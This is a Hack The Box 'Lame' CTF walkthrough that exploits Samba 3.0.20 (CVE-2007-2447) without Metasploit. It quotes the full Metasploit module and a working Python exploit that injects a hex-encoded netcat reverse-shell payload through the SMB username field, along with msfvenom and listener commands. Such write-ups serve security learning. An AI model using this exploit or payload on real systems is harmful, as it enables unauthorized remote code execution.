Hack The Box - Lame Walkthrough without Metasploit

Lame

Enumeration

First we start by running nmap against the target

nmap -sC -sV 10.10.10.3

Lame enumeration

Since FTP port is open and seems to allow Anonymous login we will try to log in and see if we can find anything

Empty ftp

We found nothing there, next thing we can see in our initial enumeration is that Samba is running with version 3.0.20-Debian, with a fast google search we will find that it is vulnerable to a Remote Heap Overflow https://www.exploit-db.com/exploits/16320

##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::SMB

	# For our customized version of session_setup_ntlmv1
	CONST = Rex::Proto::SMB::Constants
	CRYPT = Rex::Proto::SMB::Crypt

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba "username map script" Command Execution',
			'Description'    => %q{
					This module exploits a command execution vulerability in Samba
				versions 3.0.20 through 3.0.25rc3 when using the non-default
				"username map script" configuration option. By specifying a username
				containing shell meta characters, attackers can execute arbitrary
				commands.

				No authentication is needed to exploit this vulnerability since
				this option is used to map usernames prior to authentication!
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10040 $',
			'References'     =>
				[
					[ 'CVE', '2007-2447' ],
					[ 'OSVDB', '34700' ],
					[ 'BID', '23972' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
					[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,
			'Privileged'     => true, # root or nobody user
			'Payload'        =>
				{
					'Space'    => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							# *_perl and *_ruby work if they are installed
							# mileage may vary from system to system..
						}
				},
			'Targets'        =>
				[
					[ "Automatic", { } ]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 14 2007'))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end


	def exploit

		connect

		# lol?
		username = "/=`nohup " + payload.encoded + "`"
		begin
			simple.client.negotiate(false)
			simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
		rescue ::Timeout::Error, XCEPT::LoginError
			# nothing, it either worked or it didn't ;)
		end

		handler
	end

end

But that is a Metasploit module and we want to do it without it... if we read the exploit it says that its exploiting a vulnerability by specifying a username containing shell meta characters, executing commands... and no authentication is needed to exploit this vulnerability, with this information we can make our python script to exploit this samba version.

Exploitation

Creating the script

This is the skeleton of the python script we will use to exploit this Samba version

#!/usr/bin/python3
#Samba 3.0.20-Debian
from smb import *
from smb.SMBConnection import *

#msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python
payload =("");

userID = "/=` nohup " + payload + "`"
password = 'evil'
ip = '10.10.10.3'

conn = SMBConnection(userID, password,"some","thing", use_ntlm_v2=False)
conn.connect(ip, 445)

Creating the Payload

For the payload we will use msfvenom to create a reverse shell that we will capture with netcat:

msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python

Putting everything together

#!/usr/bin/python3
#Samba 3.0.20-Debian
from smb import *
from smb.SMBConnection import *

#msfvenom -p cmd/unix/reverse_netcat LHOST=<Attacker-IP> LPORT=<Attacker-Port> -f python
payload =("\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6a"
				"\x7a\x6a\x63\x6c\x6e\x67\x3b\x20\x6e\x63\x20\x31\x30"
				"\x2e\x31\x30\x2e\x31\x34\x2e\x33\x20\x34\x34\x34\x34"
				"\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x6a\x7a\x6a\x63\x6c"
				"\x6e\x67\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
				"\x3e\x2f\x74\x6d\x70\x2f\x6a\x7a\x6a\x63\x6c\x6e\x67"
				"\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d"
				"\x70\x2f\x6a\x7a\x6a\x63\x6c\x6e\x67");

userID = "/=` nohup " + payload + "`"
password = 'evil'
ip = '10.10.10.3'

conn = SMBConnection(userID, password,"some","thing", use_ntlm_v2=False)
conn.connect(ip, 445)

Now we start a listener on another shell

nc -nvlp 4444

Netcat Listener

We might run into an error while executing the script

Error running the script

In order to fix it we have to install the following python module if we are missing it:

pip3 install pysmb

Now we can run it again.. and if we have our listener ready we should be able to get a shell back

Pwnd

We got a shell back, the first thing we look for is to make it interactive, for that matter we will see if the machine has python with

which python

In this particular case that will be enought, we can use the following command to spawn an interactive shell

python -c 'import pty;pty.spawn("/bin/bash")'

Now we can grab our flag ;)